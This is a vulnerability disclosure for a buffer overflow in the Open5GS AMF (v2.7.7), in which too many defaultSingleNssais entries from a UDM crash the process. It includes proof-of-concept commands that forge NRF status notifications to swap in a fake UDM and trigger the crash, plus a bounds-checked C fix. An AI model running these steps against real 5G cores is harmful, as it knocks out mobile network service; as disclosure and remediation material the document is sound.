# Open5GS AMF Buffer Overflow Vulnerability Summary

## Vulnerability Overview

* **Vulnerability ID**: #4403
* **Vulnerability Type**: Buffer Overflow / Memory Corruption
* **Trigger Condition**: Occurs during a real UE registration when the `am-data` response from `nudm-sdm` contains an excessive number of `defaultSingleNssais` entries.
* **Root Cause**: The code performs no bounds check when copying `defaultSingleNssais` entries into the UE's slice list (`amf_ue->num_of_slice`). The target array `ogs_slice_data_t slice[OGS_MAX_NUM_OF_SLICE]` has a fixed size, but an attacker can send more entries than this limit, so the copy writes past the end of the array.
* **Impact**: The memory corruption leaves the registration procedure in an inconsistent state, which eventually trips an assertion (`gmm_state_registered`) and crashes the AMF process (exit code 134).

## Scope of Impact

* **Affected Component**: Open5GS AMF (Access and Mobility Management Function)
* **Affected Version**: v2.7.7
* **Attack Vector**: 5G registration procedure initiated by an external UE.

## Remediation

* **Expected Behavior**: The AMF should reject lists containing an excessive number of `defaultSingleNssais` entries, or limit the number of copied entries to `OGS_MAX_NUM_OF_SLICE`.
* **Current Status**: Unfixed (Open).

## POC / Exploit Code

**1. Start Environment (Docker):**

```bash
docker start db ausf udm udr pcf amf upf nssf
```

**2. Replace the real UDM in the AMF local cache with a fake UDM:**

```bash
AMF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' amf)

curl -H'content-type: application/json' \
     -H'content-type: application/json' \
     -X POST "http://$AMF_IP/nrf-nf-v1/nf-status-notify" \
     -d '{"event": "NF_DEREGISTERED", "nfInstanceId": "http://nrf.open5gs.org/nrf/nf-v1/instances/4568f3be-38..."}'

curl -H'content-type: application/json' \
     -H'content-type: application/json' \
     -X POST "http://$AMF_IP/nrf-nf-v1/nf-status-notify" \
     -d '{"event": "NF_REGISTERED", "nfInstanceId": "http://10.33.33.1:8083/nrf-nf-v1/instances/fake-ue-amf"}'
```

**3. Control Experiment: Configure the fake UDM for a single normal registration:**

```bash
printf 'control!\n' > /home/ubuntu/open5gs_277/.audit/tmp/amf_fake_udm.mode
docker restart amf-audit-gdb amf-audit-ue
docker logs --tail 60 amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
```

**4. Malicious Experiment: Change the fake UDM mode to return 32 `defaultSingleNssais` entries:**

```bash
printf 'am-data-slice-overflow!\n' > /home/ubuntu/open5gs_277/.audit/tmp/amf_fake_udm.mode
docker restart amf-audit-gdb amf-audit-ue
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' amf
docker logs --tail 120 amf
```
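The bounds-checked copy that the Remediation section asks for, as an added illustration that is not Open5GS code: the struct layouts, the value of `OGS_MAX_NUM_OF_SLICE`, and the function names `amf_ue_store_default_nssais` and `demo_store` are assumptions, while the field and macro names follow the report. It shows both remediation options named above (reject the whole list, or keep only the entries that fit).

```c
#include <stdint.h>
#include <string.h>

/* Stand-ins for the Open5GS types named in the report (assumed layouts and
 * limit, not the project's own definitions). */
#define OGS_MAX_NUM_OF_SLICE 8
typedef struct { uint8_t sst; uint32_t sd; } ogs_slice_data_t;   /* one S-NSSAI */
typedef struct { int num_of_slice; ogs_slice_data_t slice[OGS_MAX_NUM_OF_SLICE]; } amf_ue_t;
typedef enum { NSSAI_REJECT_EXCESS, NSSAI_TRUNCATE_EXCESS } nssai_policy_t;

/* Store `count` decoded defaultSingleNssais entries into amf_ue->slice[].
 * The report's defect is copying without checking that num_of_slice + count
 * fits in OGS_MAX_NUM_OF_SLICE; here the check runs before any write and the
 * caller chooses between rejecting the list and keeping only what fits.
 * Returns the number of entries stored, or -1 when the list is rejected. */
int amf_ue_store_default_nssais(amf_ue_t *ue, const ogs_slice_data_t *in,
                                size_t count, nssai_policy_t policy)
{
    if (ue == NULL || (in == NULL && count > 0)) return -1;
    if (ue->num_of_slice < 0 || ue->num_of_slice > OGS_MAX_NUM_OF_SLICE) return -1;
    size_t room = (size_t)(OGS_MAX_NUM_OF_SLICE - ue->num_of_slice);
    if (count > room) {
        if (policy == NSSAI_REJECT_EXCESS) return -1;  /* UE state untouched */
        count = room;                                   /* drop the excess */
    }
    memcpy(&ue->slice[ue->num_of_slice], in, count * sizeof(*in)); /* count <= room */
    ue->num_of_slice += (int)count;
    return (int)count;
}

/* Demo: a fresh UE receives `count` constructed entries (the report's trigger
 * is 32). Returns the store result; the UE's final slice count is left in
 * demo_last_num_of_slice for inspection. */
int demo_last_num_of_slice;
int demo_store(size_t count, nssai_policy_t policy)
{
    ogs_slice_data_t in[64];
    amf_ue_t ue;
    memset(&ue, 0, sizeof ue);
    if (count > 64) count = 64;
    for (size_t i = 0; i < count; i++) { in[i].sst = 1; in[i].sd = (uint32_t)i; }
    int rc = amf_ue_store_default_nssais(&ue, in, count, policy);
    demo_last_num_of_slice = ue.num_of_slice;
    return rc;
}
```

With the 32-entry response from step 4, the reject policy returns -1 and leaves the UE with zero slices, while the truncate policy stores exactly `OGS_MAX_NUM_OF_SLICE` entries; either way no write leaves the array.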